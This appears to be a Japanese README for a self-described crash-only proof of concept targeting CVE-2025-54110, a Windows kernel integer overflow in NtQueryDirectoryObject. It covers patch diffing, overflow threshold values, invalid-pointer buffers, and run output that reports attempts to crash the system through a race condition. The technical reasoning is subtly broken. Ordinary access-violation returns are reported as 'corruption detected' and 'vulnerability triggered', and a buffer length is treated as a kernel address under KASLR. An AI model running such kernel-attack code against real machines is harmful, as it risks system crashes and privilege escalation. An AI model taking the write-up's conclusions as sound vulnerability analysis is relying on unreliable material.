
プロジェクト日付 : 2025年10月 / CVE-2025-54110 の PoC 実装:Windows `NtQueryDirectoryObject` システムコールにおけるカーネルレベルの整数オーバーフロー脆弱性
CVE-2025-54110 のPoC実装。Windowsのシステムコール NtQueryDirectoryObject におけるカーネルレベルの整数オーバーフロー脆弱性。
CVE: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54110
このリポジトリには、CVE-2025-54110 カーネル EoP 脆弱性の Crash-Only PoC が含まれています。これは、セキュリティ研究、リバースエンジニアリング、エクスプロイト開発研究 のみを目的として開発されました。このコードは、以下のような脆弱性研究手法を示すことを目的としています。
このPoCは、特権昇格や確実なBSODを達成するものではありません。これは、Windows カーネル保護機能によって捕捉されるアクセス違反を安全にトリガーするように設計されています。
公開日: 2025年9月 (Windows 火曜日のセキュリティパッチ)
| プロパティ | 値 |
|---|---|
| CWE | CWE-190: 整数オーバーフローまたはラップアラウンド |
| CVSS 3.1 スコア | 8.8 (高) / 7.7 (時間的) |
| ベクター文字列 | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C |
| 攻撃元区分 | ローカル |
| 攻撃条件の複雑さ | 低 |
| 必要な特権レベル | 低 |
| ユーザー操作 | 不要 |
| スコープ | 変更あり |
| 機密性への影響 | 高 |
| 完全性への影響 | 高 |
| 可用性への影響 | 高 |
| エクスプロイトの成熟度 | 未実証 |
Windows カーネルの整数オーバーフロー脆弱性により、認証された攻撃者がローカルで特権を昇格させる可能性があります。Microsoft のアドバイザリによると:
「攻撃者は、サンドボックス化されたユーザーモードプロセスから特別に細工された入力を送信して整数オーバーフローをトリガーし、カーネル内でバッファオーバーフローを引き起こし、特権昇格やサンドボックスエスケープを可能にする可能性があります。」
Windows Update Files from Aug 2025 & Sep 2025 (KB.msu) ↓ Extract CAB Files ↓ Calculate SHA-256 Hashes (August vs September) ↓ Identify Changed Files ↓ Ghidra Version Tracking Analysis ↓ Setting Symbol Servers to Clarify Function Names ↓ Function-Level Diff Comparison
### 2. 分析対象ファイル
初期分析では、以下の2つの主要なカーネルコンポーネントに焦点を当てました:
#### win32k.sys (-)
- **結果:** 有意な変更は検出されませんでした
- **スコア範囲:** 0.97-1.0 (高い類似度)
- **結論:** CVE-2025-54110の脆弱性コンポーネントではありません
#### ntoskrnl.exe (+)
- **結果:** 有意な変更を含む複数の関数を検出
- **スコア範囲:** スコア ≤0.951 の関数
- **長さの差異:** ソースとデスティネーションのバイト長に変動あり
- **エクスポート項目数:** 分析用に2,036個の関数
### 3. Ghidra バージョントラッキング結果
`ntoskrnl.exe` で特定された変更のサンプル:
| スコア | 信頼度 | ソース長 | デスティネーション長 | ソース関数 | デスティネーション関数 |
|-------|------------|---------------|-------------|-----------------|---------------|
| 0.951 | 2.618 | 1023 | 365 | FUN_1403146d0 | FUN_1403a4ea0 |
| 0.950 | 2.285 | 113 | 203 | FUN_140680810 | FUN_1406d952c |
| 0.950 | 3.137 | 782 | 1050 | FUN_14032106c | FUN_140303a38 |
| 0.951 | 2.675 | 141 | 171 | FUN_140407bd0 | FUN_140a172a0 |
| 0.951 | 2.660 | 346 | 150 | FUN_140610e60 | FUN_1406115d4 |
---
## PoCの説明
### 技術的アプローチ
PoC(`precise_overflow_bsod.c`)は、以下の方法で整数オーバーフローの脆弱性をトリガーしようとします:
1. **精密なしきい値計算:** `0xfffffdbc`(base=0x20、name=0x200から導出)
2. **NtQueryDirectoryObject API:** オーバーフローをトリガーするターゲット関数
3. **多段階攻撃戦略:**
- フェーズ1: 精密な整数オーバーフローの試行
- フェーズ2: カーネルメモリのターゲティング
- フェーズ3: マルチスレッドによるエクスプロイト
### コード構造```c
// Key threshold values calculated for overflow
ULONG precise_thresholds[] = {
0xfffffdbc, // Precise threshold - base=0x20, name=0x200
0xfffffdbb, // Threshold - 1
0xfffffdbd, // Threshold + 1
0xfffffdba, // Threshold - 2
0xfffffdbe, // Threshold + 2
};
// Buffer configurations to test edge cases
PVOID buffer_types[] = {
VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE), // Normal buffer
VirtualAlloc(NULL, 0x10, MEM_COMMIT, PAGE_READWRITE), // Small buffer
NULL, // NULL pointer
(PVOID)0x4141414141414141, // Invalid pointer
(PVOID)0x0000000000000000, // Zero address
};
NtQueryDirectoryObject() Parameters: ├── DirectoryHandle: \BaseNamedObjects, \KernelObjects, etc. ├── Buffer: Various pointer configurations ├── BufferLength: Calculated overflow thresholds (0xfffffdbc variants) ├── ReturnSingleEntry: TRUE/FALSE variations ├── RestartScan: TRUE/FALSE variations └── Context: Controlled iteration state
---
## PoC がシステムをクラッシュさせない理由
### 実際の結果
PoC は一貫して `STATUS_ACCESS_VIOLATION (0xC0000005)` を返し、ブルースクリーンオブデス (BSOD) は発生しません。これは **設計上の意図** であり、Windows カーネルのいくつかの重要なセキュリティメカニズムを示しています。
### 1. 構造化例外処理 (SEH)```
User-Mode Input → NtQueryDirectoryObject
↓
ProbeForRead/Write
↓
__try { ... }
↓
Access Violation Detected
↓
__except { ... }
↓
Return STATUS_ACCESS_VIOLATION
動作する理由:
カーネルモード(Ring 0)が明示的な許可なしにユーザーモード(Ring 3)のメモリにアクセスするのを防ぐ最新のCPU機能:``` Kernel attempts to access user pointer ↓ SMAP checks permission (STAC/CLAC instructions) ↓ Unauthorized access detected ↓ CPU generates #PF (Page Fault) ↓ Caught by kernel exception handler
**PoCへの影響:**
- オーバーフローが発生しても、カーネルからユーザーへの直接メモリアクセスはブロックされます
- ポインタ参照外しの脆弱性の悪用を防ぎます
### 3. KASLR (Kernel Address Space Layout Randomization)```
Boot Time: Kernel Base = Random Address
↓
Hardcoded PoC address (0xfffffdbc)
↓
Does NOT match actual kernel structures
↓
Write to non-critical memory OR caught by SEH
Why BSOD doesn't occur:
Windows 10以上では拡張されたプール破損検出が実装されています:``` Heap/Pool Allocation ↓ Header Contains: ├── Magic Values ├── Size Information └── Checksums ↓ On Free/Access: Validate Integrity ↓ Corruption Detected? ↓ [YES] → Safe Exception → Return Error [NO] → Proceed Normally
---
## PoC実行出力分析
### 期待される出力
`STATUS_ACCESS_VIOLATION (0xC0000005)` が表示されれば、問題ありません。```
C:\Users\reLab\Desktop\cve>.\poc64.exe
==================================================
CVE-2025-54110 - Kernel Integer Overflow PoC
==================================================
[!] WARNING: This code may crash the system (BSOD).
[?] Do you want to continue? (y/n): y
[>] Targeting directory: \BaseNamedObjects
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \KernelObjects
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \Sessions
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \Windows
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[-] Exploit finished. If the system is still running, the attack may have been mitigated.